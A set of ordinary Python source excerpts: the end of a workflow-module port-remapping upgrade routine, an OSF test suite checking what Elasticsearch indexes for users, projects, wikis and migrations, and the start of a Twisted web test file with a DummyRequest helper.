            # No signature match: fall back to _1, or the f_map override.
            port_idx = 1
            if desc.name in f_map:
                if port_prefix in f_map[desc.name]:
                    port_idx = f_map[desc.name][port_prefix]
            port_name = "%s_%d" % (port_prefix, port_idx)
            new_function = build_function(old_function, port_name, new_module)
            new_module.add_function(new_function)
            return []
        return remap
    def process_ports(desc, port_type):
        if port_type == 'input':
            remap_dict_key = 'dst_port_remap'
        else:
            remap_dict_key = 'src_port_remap'
        ports = get_port_specs(desc, port_type)
        # Track, per un-numbered prefix, the highest overload number seen.
        port_nums = {}
        for port_name, port_spec in ports.iteritems():
            # FIXME just start at 1 and go until don't find port (no
            # need to track max)?
            search_res = uscore_num.search(port_name)
            if search_res:
                port_prefix = search_res.group(1)
                port_num = int(search_res.group(2))
                if port_prefix not in port_nums:
                    port_nums[port_prefix] = port_num
                elif port_num > port_nums[port_prefix]:
                    port_nums[port_prefix] = port_num
        if desc.name not in _remap:
            _remap[desc.name] = [(None, '0.9.3', None, dict())]
        for port_prefix, port_num in port_nums.iteritems():
            my_remap_dict = _remap[desc.name][0][3]
            if remap_dict_key not in my_remap_dict:
                my_remap_dict[remap_dict_key] = dict()
            remap = build_remap_method(desc, port_prefix, port_num, port_type)
            my_remap_dict[remap_dict_key][port_prefix] = remap
            if port_type == 'input':
                remap = build_function_remap_method(desc, port_prefix, port_num)
                if 'function_remap' not in my_remap_dict:
                    my_remap_dict['function_remap'] = {}
                my_remap_dict['function_remap'][port_prefix] = remap
    pkg = reg.get_package_by_name(identifier)
    if module_name is not None:
        # print 'building remap for', module_name
        desc = reg.get_descriptor_by_name(identifier, module_name)
        process_ports(desc, 'input')
        process_ports(desc, 'output')
    else:
        # print 'building entire remap'
        # FIXME do this by descriptor first, then build the hierarchies for each
        # module after that...
        for desc in pkg.descriptor_list:
            process_ports(desc, 'input')
            process_ports(desc, 'output')
def handle_module_upgrade_request(controller, module_id, pipeline):
    """Entry point called when a module in a legacy workflow needs upgrading.

    Stashes the upgrade context in module globals (read back by the remap
    closures via _get_controller/_get_pipeline), lazily builds the remap
    table for the module's name the first time it is seen, then delegates
    the actual rewrite to UpgradeWorkflowHandler.remap_module.
    """
    global _remap, _controller, _pipeline
    # Fix: the original assigned `reg = get_module_registry()` here and
    # never used it; the unused local has been removed.
    if _remap is None:
        _remap = {}
    _controller = controller
    _pipeline = pipeline
    module_name = pipeline.modules[module_id].name
    if module_name not in _remap:
        build_remap(module_name)
    return UpgradeWorkflowHandler.remap_module(controller, module_id, pipeline,
                                               _remap)
| |
# -*- coding: utf-8 -*-
import time
import unittest
import logging
import functools
from nose.tools import * # flake8: noqa (PEP8 asserts)
import mock
from framework.auth.core import Auth
from website import settings
import website.search.search as search
from website.search import elastic_search
from website.search.util import build_query
from website.search_migration.migrate import migrate
from website.models import Retraction
from tests.base import OsfTestCase
from tests.test_features import requires_search
from tests.factories import (
UserFactory, ProjectFactory, NodeFactory,
UnregUserFactory, UnconfirmedUserFactory,
RegistrationFactory
)
# Name of the Elasticsearch index used by these tests; swapped in during
# SearchTestCase.setUp so the production index is never touched.
TEST_INDEX = 'test'
@requires_search
class SearchTestCase(OsfTestCase):
    """Base class for search tests.

    Points the search layer at TEST_INDEX and recreates the index in both
    setUp and tearDown so each test starts and ends with an empty index.
    """
    def tearDown(self):
        super(SearchTestCase, self).tearDown()
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)
    def setUp(self):
        super(SearchTestCase, self).setUp()
        elastic_search.INDEX = TEST_INDEX
        settings.ELASTIC_INDEX = TEST_INDEX
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)
def query(term):
    """Search the test index for *term* and return the raw results payload."""
    return search.search(build_query(term), index=elastic_search.INDEX)
def query_user(name):
    """Search for user documents whose name matches *name* exactly."""
    return query('category:user AND "{}"'.format(name))
def retry_assertion(interval=0.3, retries=3):
    """Decorator factory for flaky search assertions.

    If the decorated test raises AssertionError, sleep *interval* seconds
    and re-run it, up to *retries* additional attempts; once the budget is
    exhausted the original AssertionError is re-raised.
    """
    def test_wrapper(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            try:
                func(*args, **kwargs)
            except AssertionError as e:
                if not retries:
                    raise e
                time.sleep(interval)
                retry_assertion(interval=interval,
                                retries=retries - 1)(func)(*args, **kwargs)
        return wrapped
    return test_wrapper
@requires_search
class TestUserUpdate(SearchTestCase):
    """Tests that user creation and profile changes are reflected in the
    search index."""
    def setUp(self):
        super(TestUserUpdate, self).setUp()
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)
        self.user = UserFactory(fullname='David Bowie')
    def test_new_user(self):
        # Verify that user has been added to Elastic Search
        docs = query_user(self.user.fullname)['results']
        assert_equal(len(docs), 1)
    def test_new_user_unconfirmed(self):
        # Unconfirmed users must not be indexed until they confirm.
        user = UnconfirmedUserFactory()
        docs = query_user(user.fullname)['results']
        assert_equal(len(docs), 0)
        token = user.get_confirmation_token(user.username)
        user.confirm_email(token)
        user.save()
        docs = query_user(user.fullname)['results']
        assert_equal(len(docs), 1)
    def test_change_name(self):
        # Add a user, change her name, and verify that only the new name is
        # found in search.
        user = UserFactory(fullname='Barry Mitchell')
        fullname_original = user.fullname
        user.fullname = user.fullname[::-1]
        user.save()
        docs_original = query_user(fullname_original)['results']
        assert_equal(len(docs_original), 0)
        docs_current = query_user(user.fullname)['results']
        assert_equal(len(docs_current), 1)
    def test_disabled_user(self):
        # Test that disabled users are not in search index
        user = UserFactory(fullname='Bettie Page')
        user.save()
        # Ensure user is in search index
        assert_equal(len(query_user(user.fullname)['results']), 1)
        # Disable the user
        user.is_disabled = True
        user.save()
        # Ensure user is not in search index
        assert_equal(len(query_user(user.fullname)['results']), 0)
    def test_merged_user(self):
        # After a merge, only the surviving account should be indexed.
        user = UserFactory(fullname='Annie Lennox')
        merged_user = UserFactory(fullname='Lisa Stansfield')
        user.save()
        merged_user.save()
        assert_equal(len(query_user(user.fullname)['results']), 1)
        assert_equal(len(query_user(merged_user.fullname)['results']), 1)
        user.merge_user(merged_user)
        assert_equal(len(query_user(user.fullname)['results']), 1)
        assert_equal(len(query_user(merged_user.fullname)['results']), 0)
    def test_employment(self):
        # A job's institution becomes searchable once added to the profile.
        user = UserFactory(fullname='Helga Finn')
        user.save()
        institution = 'Finn\'s Fine Filers'
        docs = query_user(institution)['results']
        assert_equal(len(docs), 0)
        user.jobs.append({
            'institution': institution,
            'title': 'The Big Finn',
        })
        user.save()
        docs = query_user(institution)['results']
        assert_equal(len(docs), 1)
    def test_education(self):
        # A school's institution becomes searchable once added to the profile.
        user = UserFactory(fullname='Henry Johnson')
        user.save()
        institution = 'Henry\'s Amazing School!!!'
        docs = query_user(institution)['results']
        assert_equal(len(docs), 0)
        user.schools.append({
            'institution': institution,
            'degree': 'failed all classes',
        })
        user.save()
        docs = query_user(institution)['results']
        assert_equal(len(docs), 1)
    def test_name_fields(self):
        # Every name component (given, middle, family, suffix) is searchable
        # and resolves to the same user document.
        names = ['Bill Nye', 'William', 'the science guy', 'Sanford', 'the Great']
        user = UserFactory(fullname=names[0])
        user.given_name = names[1]
        user.middle_names = names[2]
        user.family_name = names[3]
        user.suffix = names[4]
        user.save()
        docs = [query_user(name)['results'] for name in names]
        assert_equal(sum(map(len, docs)), len(docs)) # 1 result each
        assert_true(all([user._id == doc[0]['id'] for doc in docs]))
@requires_search
class TestProject(SearchTestCase):
    """Tests that a project's privacy setting controls its presence in
    search."""
    def setUp(self):
        super(TestProject, self).setUp()
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)
        self.user = UserFactory(fullname='John Deacon')
        self.project = ProjectFactory(title='Red Special', creator=self.user)
    def test_new_project_private(self):
        # Verify that a private project is not present in Elastic Search.
        docs = query(self.project.title)['results']
        assert_equal(len(docs), 0)
    def test_make_public(self):
        # Make project public, and verify that it is present in Elastic
        # Search.
        self.project.set_privacy('public')
        docs = query(self.project.title)['results']
        assert_equal(len(docs), 1)
@requires_search
class TestRegistrationRetractions(SearchTestCase):
    """Tests for how pending and approved retractions affect whether a
    registration and its wiki content appear in search."""
    def setUp(self):
        super(TestRegistrationRetractions, self).setUp()
        # Fix: the keyword was misspelled 'usename', which the factory
        # silently ignored; 'fullname' is the field every other test in
        # this module uses.
        self.user = UserFactory(fullname='Doug Bogie')
        self.title = 'Red Special'
        self.consolidate_auth = Auth(user=self.user)
        self.project = ProjectFactory(
            title=self.title,
            creator=self.user,
            is_public=True,
        )
        self.registration = RegistrationFactory(
            project=self.project,
            title=self.title,
            creator=self.user,
            is_public=True,
            is_registration=True
        )
    def test_retraction_is_searchable(self):
        # A retracted registration itself remains findable.
        self.registration.retract_registration(self.user)
        docs = query('category:registration AND ' + self.title)['results']
        assert_equal(len(docs), 1)
    @mock.patch('website.project.model.Node.archiving', mock.PropertyMock(return_value=False))
    def test_pending_retraction_wiki_content_is_searchable(self):
        # Add unique string to wiki
        wiki_content = {'home': 'public retraction test'}
        for key, value in wiki_content.items():
            docs = query(value)['results']
            assert_equal(len(docs), 0)
            self.registration.update_node_wiki(
                key, value, self.consolidate_auth,
            )
            # Query and ensure unique string shows up
            docs = query(value)['results']
            assert_equal(len(docs), 1)
        # Query and ensure registration does show up
        docs = query('category:registration AND ' + self.title)['results']
        assert_equal(len(docs), 1)
        # Retract registration
        self.registration.retract_registration(self.user, '')
        self.registration.save()
        self.registration.reload()
        # Query and ensure unique string in wiki STILL shows up: the
        # retraction is only pending, not approved.  (The original comment
        # here said "doesn't show up", contradicting the assertion below.)
        docs = query('category:registration AND "{}"'.format(wiki_content['home']))['results']
        assert_equal(len(docs), 1)
        # Query and ensure registration does show up
        docs = query('category:registration AND ' + self.title)['results']
        assert_equal(len(docs), 1)
    @mock.patch('website.project.model.Node.archiving', mock.PropertyMock(return_value=False))
    def test_retraction_wiki_content_is_not_searchable(self):
        # Add unique string to wiki
        wiki_content = {'home': 'public retraction test'}
        for key, value in wiki_content.items():
            docs = query(value)['results']
            assert_equal(len(docs), 0)
            self.registration.update_node_wiki(
                key, value, self.consolidate_auth,
            )
            # Query and ensure unique string shows up
            docs = query(value)['results']
            assert_equal(len(docs), 1)
        # Query and ensure registration does show up
        docs = query('category:registration AND ' + self.title)['results']
        assert_equal(len(docs), 1)
        # Retract registration and force the retraction to APPROVED so the
        # wiki content must disappear from the index.
        self.registration.retract_registration(self.user, '')
        self.registration.retraction.state = Retraction.APPROVED
        self.registration.retraction.save()
        self.registration.save()
        self.registration.update_search()
        # Query and ensure unique string in wiki doesn't show up
        docs = query('category:registration AND "{}"'.format(wiki_content['home']))['results']
        assert_equal(len(docs), 0)
        # Query and ensure registration does show up
        docs = query('category:registration AND ' + self.title)['results']
        assert_equal(len(docs), 1)
@requires_search
class TestPublicNodes(SearchTestCase):
    """Tests that privacy, titles, tags, wikis, and contributors of public
    projects/components/registrations are reflected in search."""
    def setUp(self):
        super(TestPublicNodes, self).setUp()
        # Fix: the keyword was misspelled 'usename', which the factory
        # silently ignored; 'fullname' is the field every other test in
        # this module uses.
        self.user = UserFactory(fullname='Doug Bogie')
        self.title = 'Red Special'
        self.consolidate_auth = Auth(user=self.user)
        self.project = ProjectFactory(
            title=self.title,
            creator=self.user,
            is_public=True,
        )
        self.component = NodeFactory(
            parent=self.project,
            title=self.title,
            creator=self.user,
            is_public=True
        )
        self.registration = ProjectFactory(
            title=self.title,
            creator=self.user,
            is_public=True,
            is_registration=True
        )
    def test_make_private(self):
        # Make project public, then private, and verify that it is not present
        # in search.
        self.project.set_privacy('private')
        docs = query('category:project AND ' + self.title)['results']
        assert_equal(len(docs), 0)
        self.component.set_privacy('private')
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 0)
    def test_public_parent_title(self):
        # A component document carries its (public) parent's title and URL.
        self.project.set_title('hello & world', self.consolidate_auth)
        self.project.save()
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 1)
        assert_equal(docs[0]['parent_title'], 'hello & world')
        assert_true(docs[0]['parent_url'])
    def test_make_parent_private(self):
        # Make parent of component, public, then private, and verify that the
        # component still appears but doesn't link to the parent in search.
        self.project.set_privacy('private')
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 1)
        assert_equal(docs[0]['parent_title'], '-- private project --')
        assert_false(docs[0]['parent_url'])
    def test_delete_project(self):
        # Deleted nodes disappear from the index.
        self.component.remove_node(self.consolidate_auth)
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 0)
        self.project.remove_node(self.consolidate_auth)
        docs = query('category:project AND ' + self.title)['results']
        assert_equal(len(docs), 0)
    def test_change_title(self):
        # Only the current title is searchable after a rename.
        title_original = self.project.title
        self.project.set_title(
            'Blue Ordinary', self.consolidate_auth, save=True)
        docs = query('category:project AND ' + title_original)['results']
        assert_equal(len(docs), 0)
        docs = query('category:project AND ' + self.project.title)['results']
        assert_equal(len(docs), 1)
    def test_add_tags(self):
        tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
        for tag in tags:
            docs = query('tags:"{}"'.format(tag))['results']
            assert_equal(len(docs), 0)
            self.project.add_tag(tag, self.consolidate_auth, save=True)
        for tag in tags:
            docs = query('tags:"{}"'.format(tag))['results']
            assert_equal(len(docs), 1)
    def test_remove_tag(self):
        tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
        for tag in tags:
            self.project.add_tag(tag, self.consolidate_auth, save=True)
            self.project.remove_tag(tag, self.consolidate_auth, save=True)
            docs = query('tags:"{}"'.format(tag))['results']
            assert_equal(len(docs), 0)
    def test_update_wiki(self):
        """Add text to a wiki page, then verify that project is found when
        searching for wiki text.
        """
        wiki_content = {
            'home': 'Hammer to fall',
            'swag': '#YOLO'
        }
        for key, value in wiki_content.items():
            docs = query(value)['results']
            assert_equal(len(docs), 0)
            self.project.update_node_wiki(
                key, value, self.consolidate_auth,
            )
            docs = query(value)['results']
            assert_equal(len(docs), 1)
    def test_clear_wiki(self):
        # Add wiki text to page, then delete, then verify that project is not
        # found when searching for wiki text.
        wiki_content = 'Hammer to fall'
        self.project.update_node_wiki(
            'home', wiki_content, self.consolidate_auth,
        )
        self.project.update_node_wiki('home', '', self.consolidate_auth)
        docs = query(wiki_content)['results']
        assert_equal(len(docs), 0)
    def test_add_contributor(self):
        # Add a contributor, then verify that project is found when searching
        # for contributor.
        user2 = UserFactory(fullname='Adam Lambert')
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 0)
        self.project.add_contributor(user2, save=True)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 1)
    def test_remove_contributor(self):
        # Add and remove a contributor, then verify that project is not found
        # when searching for contributor.
        user2 = UserFactory(fullname='Brian May')
        self.project.add_contributor(user2, save=True)
        self.project.remove_contributor(user2, self.consolidate_auth)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 0)
    def test_hide_contributor(self):
        # Invisible contributors do not make the project searchable by name.
        user2 = UserFactory(fullname='Brian May')
        self.project.add_contributor(user2)
        self.project.set_visible(user2, False, save=True)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 0)
        self.project.set_visible(user2, True, save=True)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 1)
    def test_wrong_order_search(self):
        # Word order in the query should not matter; all three nodes
        # (project, component, registration) share the title.
        title_parts = self.title.split(' ')
        title_parts.reverse()
        title_search = ' '.join(title_parts)
        docs = query(title_search)['results']
        assert_equal(len(docs), 3)
    def test_tag_aggregation(self):
        tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
        for tag in tags:
            self.project.add_tag(tag, self.consolidate_auth, save=True)
        docs = query(self.title)['tags']
        assert len(docs) == 3
        for doc in docs:
            assert doc['key'] in tags
@requires_search
class TestAddContributor(SearchTestCase):
    # Tests of the search.search_contributor method

    def setUp(self):
        super(TestAddContributor, self).setUp()
        # name1/name3 are registered as users below; name2/name4 are
        # deliberately never registered, so searches for them must be empty.
        self.name1 = 'Roger1 Taylor1'
        self.name2 = 'John2 Deacon2'
        # NOTE(review): u'\xc3\xb3' is the UTF-8 byte pair for o-acute pasted
        # into a unicode literal (mojibake for u'j\xf3...' / u'B\xf3...') --
        # confirm whether the accented single characters were intended.
        self.name3 = u'j\xc3\xb3ebert3 Smith3'
        self.name4 = u'B\xc3\xb3bbert4 Jones4'
        self.user = UserFactory(fullname=self.name1)
        self.user3 = UserFactory(fullname=self.name3)

    def test_unreg_users_dont_show_in_search(self):
        # Unregistered users must not surface in contributor search.
        unreg = UnregUserFactory()
        contribs = search.search_contributor(unreg.fullname)
        assert_equal(len(contribs['users']), 0)

    def test_unreg_users_do_show_on_projects(self):
        # ...but a public project created by an unregistered user is findable
        # by that user's name.
        unreg = UnregUserFactory(fullname='Robert Paulson')
        self.project = ProjectFactory(
            title='Glamour Rock',
            creator=unreg,
            is_public=True,
        )
        results = query(unreg.fullname)['results']
        assert_equal(len(results), 1)

    def test_search_fullname(self):
        # Searching for full name yields exactly one result.
        contribs = search.search_contributor(self.name1)
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name2)
        assert_equal(len(contribs['users']), 0)

    def test_search_firstname(self):
        # Searching for first name yields exactly one result.
        contribs = search.search_contributor(self.name1.split(' ')[0])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name2.split(' ')[0])
        assert_equal(len(contribs['users']), 0)

    def test_search_partial(self):
        # Searching for part of first name yields exactly one result.
        contribs = search.search_contributor(self.name1.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name2.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 0)

    def test_search_fullname_special_character(self):
        # Searching for a fullname with a special character yields
        # exactly one result.
        contribs = search.search_contributor(self.name3)
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name4)
        assert_equal(len(contribs['users']), 0)

    def test_search_firstname_special_charcter(self):
        # Searching for a first name with a special character yields
        # exactly one result.
        contribs = search.search_contributor(self.name3.split(' ')[0])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name4.split(' ')[0])
        assert_equal(len(contribs['users']), 0)

    def test_search_partial_special_character(self):
        # Searching for a partial name with a special character yields
        # exactly one result.
        contribs = search.search_contributor(self.name3.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name4.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 0)
@requires_search
class TestProjectSearchResults(SearchTestCase):
    """Verify stemming: singular, plural and possessive titles match each
    other's queries, while an unrelated project never matches."""

    def setUp(self):
        super(TestProjectSearchResults, self).setUp()
        # BUG FIX: was UserFactory(usename=...) -- 'usename' is a typo and is
        # not a user field; the intended keyword is 'fullname'.
        self.user = UserFactory(fullname='Doug Bogie')
        self.singular = 'Spanish Inquisition'
        self.plural = 'Spanish Inquisitions'
        self.possessive = 'Spanish\'s Inquisition'
        self.project_singular = ProjectFactory(
            title=self.singular,
            creator=self.user,
            is_public=True,
        )
        self.project_plural = ProjectFactory(
            title=self.plural,
            creator=self.user,
            is_public=True,
        )
        self.project_possessive = ProjectFactory(
            title=self.possessive,
            creator=self.user,
            is_public=True,
        )
        # Control project that must never match the Inquisition queries.
        self.project_unrelated = ProjectFactory(
            title='Cardinal Richelieu',
            creator=self.user,
            is_public=True,
        )

    def test_singular_query(self):
        # Verify searching for the singular term includes singular,
        # possessive and plural versions in results.
        results = query(self.singular)['results']
        assert_equal(len(results), 3)

    def test_plural_query(self):
        # Verify searching for the plural term includes singular,
        # possessive and plural versions in results.
        results = query(self.plural)['results']
        assert_equal(len(results), 3)

    def test_possessive_query(self):
        # Verify searching for the possessive term includes singular,
        # possessive and plural versions in results.
        results = query(self.possessive)['results']
        assert_equal(len(results), 3)
def job(**kwargs):
    """Build a dict describing one employment entry for test fixtures.

    Any known key may be overridden via a keyword argument; keys not
    supplied fall back to deterministic defaults: 'December' for keys
    ending in 'Month', '2000' for keys ending in 'Year', and
    'test_<key>' for everything else.

    :param kwargs: overrides for any of the known job fields.
    :return: dict containing exactly the known job keys.
    """
    keys = [
        'title',
        'institution',
        'department',
        'location',
        'startMonth',
        'startYear',
        'endMonth',
        'endYear',
        'ongoing',
    ]
    job = {}
    for key in keys:
        # str.endswith is clearer and less error-prone than the previous
        # fixed-width slice comparisons (key[-5:] / key[-4:]).
        if key.endswith('Month'):
            job[key] = kwargs.get(key, 'December')
        elif key.endswith('Year'):
            job[key] = kwargs.get(key, '2000')
        else:
            job[key] = kwargs.get(key, 'test_{}'.format(key))
    return job
class TestUserSearchResults(SearchTestCase):
    # User search over employment history: anyone who ever listed an
    # institution should surface for a query on that institution; ranking
    # of current employees is only asserted in a (skipped) ordering test.

    def setUp(self):
        super(TestUserSearchResults, self).setUp()
        # NOTE(review): 'Date Soong' is presumably a typo for 'Data Soong';
        # harmless for these assertions, but confirm before reusing the name.
        self.user_one = UserFactory(jobs=[job(institution='Oxford'),
                                          job(institution='Star Fleet')],
                                    fullname='Date Soong')
        self.user_two = UserFactory(jobs=[job(institution='Grapes la Picard'),
                                          job(institution='Star Fleet')],
                                    fullname='Jean-Luc Picard')
        self.user_three = UserFactory(jobs=[job(institution='Star Fleet'),
                                            job(institution='Federation Medical')],
                                      fullname='Beverly Crusher')
        self.user_four = UserFactory(jobs=[job(institution='Star Fleet')],
                                     fullname='William Riker')
        self.user_five = UserFactory(jobs=[job(institution='Traveler intern'),
                                           job(institution='Star Fleet Academy'),
                                           job(institution='Star Fleet Intern')],
                                     fullname='Wesley Crusher')
        # 25 unrelated users as background noise.
        for i in range(25):
            UserFactory(jobs=[job()])
        # NOTE(review): presumably the users whose first-listed ("current")
        # job is Star Fleet -- confirm the ordering semantics of 'jobs'.
        self.current_starfleet = [
            self.user_three,
            self.user_four,
        ]
        self.were_starfleet = [
            self.user_one,
            self.user_two,
            self.user_three,
            self.user_four,
            self.user_five
        ]

    @unittest.skip('Cannot guarentee always passes')
    def test_current_job_first_in_results(self):
        # Ranking: current Star Fleet employees should be the top results.
        results = query_user('Star Fleet')['results']
        result_names = [r['names']['fullname'] for r in results]
        current_starfleet_names = [u.fullname for u in self.current_starfleet]
        for name in result_names[:2]:
            assert_in(name, current_starfleet_names)

    def test_had_job_in_results(self):
        # Anyone who ever worked at Star Fleet appears in the results.
        results = query_user('Star Fleet')['results']
        result_names = [r['names']['fullname'] for r in results]
        were_starfleet_names = [u.fullname for u in self.were_starfleet]
        for name in result_names:
            assert_in(name, were_starfleet_names)
class TestSearchExceptions(OsfTestCase):
    """Saving users/projects must not break when the search backend is gone.

    The Elasticsearch client is removed for the duration of the class so
    every indexing call fails; model saves must still succeed.
    """

    @classmethod
    def setUpClass(cls):
        # The model layer logs the expected connection errors; silence them.
        logging.getLogger('website.project.model').setLevel(logging.CRITICAL)
        super(TestSearchExceptions, cls).setUpClass()
        if settings.SEARCH_ENGINE == 'elastic':
            # Simulate a lost connection by removing the client entirely.
            cls._es = search.search_engine.es
            search.search_engine.es = None

    @classmethod
    def tearDownClass(cls):
        super(TestSearchExceptions, cls).tearDownClass()
        if settings.SEARCH_ENGINE == 'elastic':
            # Restore the saved client for subsequent test classes.
            search.search_engine.es = cls._es

    def test_connection_error(self):
        # Ensures that saving projects/users doesn't break as a result of
        # connection errors.
        # BUG FIX: was UserFactory(usename=...) -- 'usename' is a typo for
        # the 'fullname' keyword.
        self.user = UserFactory(fullname='Doug Bogie')
        self.project = ProjectFactory(
            title="Tom Sawyer",
            creator=self.user,
            is_public=True,
        )
        self.user.save()
        self.project.save()
class TestSearchMigration(SearchTestCase):
    # Verify that the correct indices are created/deleted during migration

    @classmethod
    def tearDownClass(cls):
        super(TestSearchMigration, cls).tearDownClass()
        # Recreate the canonical index so later test classes start clean.
        search.create_index(settings.ELASTIC_INDEX)

    def setUp(self):
        super(TestSearchMigration, self).setUp()
        self.es = search.search_engine.es
        # Start each test from a freshly created (empty) index.
        search.delete_index(settings.ELASTIC_INDEX)
        search.create_index(settings.ELASTIC_INDEX)
        self.user = UserFactory(fullname='David Bowie')
        self.project = ProjectFactory(
            title=settings.ELASTIC_INDEX,
            creator=self.user,
            is_public=True
        )

    def test_first_migration_no_delete(self):
        migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
        var = self.es.indices.get_aliases()
        # Migration creates a versioned index (_v1) aliased to the
        # canonical index name.
        assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)

    def test_multiple_migrations_no_delete(self):
        # Each successive migration bumps the version suffix and moves the
        # alias; with delete=False old versions are left in place.
        for n in xrange(1, 21):
            migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
            var = self.es.indices.get_aliases()
            assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)

    def test_first_migration_with_delete(self):
        migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
        var = self.es.indices.get_aliases()
        assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)

    def test_multiple_migrations_with_delete(self):
        # Two migrations per iteration: after the second, the superseded
        # version (_v{n}) must have been removed.
        for n in xrange(1, 21, 2):
            migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
            var = self.es.indices.get_aliases()
            assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
            migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
            var = self.es.indices.get_aliases()
            assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n + 1)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
            assert not var.get(settings.ELASTIC_INDEX + '_v{}'.format(n))
| |
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for various parts of L{twisted.web}.
"""
from cStringIO import StringIO
from zope.interface import implements
from zope.interface.verify import verifyObject
from twisted.trial import unittest
from twisted.internet import reactor
from twisted.internet.address import IPv4Address
from twisted.internet.defer import Deferred
from twisted.web import server, resource, util
from twisted.internet import defer, interfaces, task
from twisted.web import iweb, http, http_headers
from twisted.python import log
class DummyRequest:
    """
    Represents a dummy or fake request.
    @ivar _finishedDeferreds: C{None} or a C{list} of L{Deferreds} which will
        be called back with C{None} when C{finish} is called or which will be
        errbacked if C{processingFailed} is called.
    @type headers: C{dict}
    @ivar headers: A mapping of header name to header value for all request
        headers.
    @type outgoingHeaders: C{dict}
    @ivar outgoingHeaders: A mapping of header name to header value for all
        response headers.
    @type responseCode: C{int}
    @ivar responseCode: The response code which was passed to
        C{setResponseCode}.
    @type written: C{list} of C{str}
    @ivar written: The bytes which have been written to the request.
    """
    uri = 'http://dummy/'
    method = 'GET'
    client = None

    def registerProducer(self, prod, s):
        # Naive synchronous pull loop: drives the producer until
        # unregisterProducer() clears the flag.
        self.go = 1
        while self.go:
            prod.resumeProducing()

    def unregisterProducer(self):
        self.go = 0

    def __init__(self, postpath, session=None):
        self.sitepath = []
        self.written = []
        self.finished = 0
        self.postpath = postpath
        self.prepath = []
        self.session = None
        # protoSession is promoted to the real session lazily in getSession().
        self.protoSession = session or server.Session(0, self)
        self.args = {}
        self.outgoingHeaders = {}
        self.responseHeaders = http_headers.Headers()
        self.responseCode = None
        self.headers = {}
        self._finishedDeferreds = []

    def getHeader(self, name):
        """
        Retrieve the value of a request header.
        @type name: C{str}
        @param name: The name of the request header for which to retrieve the
            value.  Header names are compared case-insensitively.
        @rtype: C{str} or L{NoneType}
        @return: The value of the specified request header.
        """
        return self.headers.get(name.lower(), None)

    def setHeader(self, name, value):
        """TODO: make this assert on write() if the header is content-length
        """
        self.outgoingHeaders[name.lower()] = value

    def getSession(self):
        if self.session:
            return self.session
        assert not self.written, "Session cannot be requested after data has been written."
        self.session = self.protoSession
        return self.session

    def render(self, resource):
        """
        Render the given resource as a response to this request.
        This implementation only handles a few of the most common behaviors of
        resources.  It can handle a render method that returns a string or
        C{NOT_DONE_YET}.  It doesn't know anything about the semantics of
        request methods (eg HEAD) nor how to set any particular headers.
        Basically, it's largely broken, but sufficient for some tests at least.
        It should B{not} be expanded to do all the same stuff L{Request} does.
        Instead, L{DummyRequest} should be phased out and L{Request} (or some
        other real code factored in a different way) used.
        """
        result = resource.render(self)
        if result is server.NOT_DONE_YET:
            return
        self.write(result)
        self.finish()

    def write(self, data):
        self.written.append(data)

    def notifyFinish(self):
        """
        Return a L{Deferred} which is called back with C{None} when the request
        is finished.  This will probably only work if you haven't called
        C{finish} yet.
        """
        finished = Deferred()
        self._finishedDeferreds.append(finished)
        return finished

    def finish(self):
        """
        Record that the request is finished and callback and L{Deferred}s
        waiting for notification of this.
        """
        self.finished = self.finished + 1
        if self._finishedDeferreds is not None:
            # Clear the list before firing so the observers run exactly once
            # even if a callback triggers finish() again.
            observers = self._finishedDeferreds
            self._finishedDeferreds = None
            for obs in observers:
                obs.callback(None)

    def processingFailed(self, reason):
        """
        Errback and L{Deferreds} waiting for finish notification.
        """
        if self._finishedDeferreds is not None:
            observers = self._finishedDeferreds
            self._finishedDeferreds = None
            for obs in observers:
                obs.errback(reason)

    def addArg(self, name, value):
        self.args[name] = [value]

    def setResponseCode(self, code, message=None):
        """
        Set the HTTP status response code, but takes care that this is called
        before any data is written.
        """
        assert not self.written, "Response code cannot be set after data has been written: %s." % "@@@@".join(self.written)
        self.responseCode = code
        self.responseMessage = message

    def setLastModified(self, when):
